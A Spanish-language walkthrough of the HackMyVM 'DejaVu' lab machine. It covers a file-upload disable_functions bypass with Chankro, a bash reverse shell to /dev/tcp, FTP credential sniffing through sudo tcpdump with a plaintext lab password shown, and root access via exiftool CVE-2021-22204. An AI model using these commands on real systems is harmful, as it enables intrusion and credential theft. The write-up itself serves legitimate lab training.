cd ~/blog

~/writeups/hmv/067-dejavu.md

067 - DejaVu

easy Linux hmv 13-04-2024
File upload + disable_functions bypass (Chankro)sudo tcpdump FTP sniffingsudo exiftool RCE (CVE-2021-22204)
hackmyvm.eu/machines/machine.php?vm=Dejavu

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.27
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.27
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-13 13:09 -04
Nmap scan report for 192.168.1.27
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
|   256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_  256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds

Enumeramos con gobuster:

 gobuster dir -u 'http://192.168.1.27' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 69947]
...

En el código de /info.php hay una pista:

<!-- /S3cR3t -->

/S3cR3t tiene un formulario de subida y un subdirectorio files. La subida de .php/.phtml se acepta, pero el disable_functions bloquea la ejecución, así que usamos Chankro para bypassearlo (vía LD_PRELOAD):

 cat rev.sh
bash -c 'bash -i >& /dev/tcp/192.168.1.10/1234 0>&1'

 chankro3 --arch 64 --input rev.sh --output pwned.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/
     -=[ Chankro ]=-
    -={ @TheXC3LL }=-

[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: pwned.phtml

[+] File created!

Subimos el .phtml y accedemos a http://192.168.1.27/S3cR3t/files/pwned.phtml:

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 192.168.1.27:35762.
bash: cannot set terminal process group (750): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$

Para escalar, revisamos sudo -l:

<nMostCriticalInternetSecurityThreats/S3cR3t/files$ sudo -l
...
User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump

Con pspy64 vemos un script auth.sh que establece una conexión FTP local periódica:

...
2024/04/13 18:35:01 CMD: UID=1000  PID=2386   | /bin/sh /home/robert/auth.sh
2024/04/13 18:35:01 CMD: UID=65534 PID=2388   | /usr/sbin/vsftpd /etc/vsftpd.conf
...

Usamos tcpdump (como robert) para capturar el tráfico FTP en loopback y obtener las credenciales:

www-data@dejavu:/home$ sudo -u robert tcpdump -i lo port ftp
...
length 13: FTP: USER robert
length 18: FTP: PASS 9737bo0hFx4
...

Cambiamos al usuario robert y obtenemos la primera flag:

www-data@dejavu:/home$ su robert
su robert
Password: 9737bo0hFx4
whoami
robert

Revisamos sudo -l como robert:

robert@dejavu:~$ sudo -l
...
User robert may run the following commands on dejavu:
    (root) NOPASSWD: /usr/local/bin/exiftool

La versión de exiftool (12.23) es vulnerable a RCE (CVE-2021-22204):

robert@dejavu:/tmp$ exiftool -ver
12.23

 searchsploit exiftool
...
ExifTool 12.23 - Arbitrary Code Execution | linux/local/50911.py
...

Usamos el exploit de convisolabs/CVE-2021-22204-exiftool para generar un .djvu malicioso y lo procesamos como root:

robert@dejavu:/tmp$ python3 exploit.py
Config file not found
Warning: Sorry, HasselbladExif is not writable
Nothing to do.

robert@dejavu:/tmp$ ls
exploit.djvu  exploit.py  payload  payload.bzz

robert@dejavu:/tmp$ sudo -u root exiftool ./exploit.djvu

 ncat -nlvp 4321
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 192.168.1.27:58826.
root@dejavu:/tmp#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados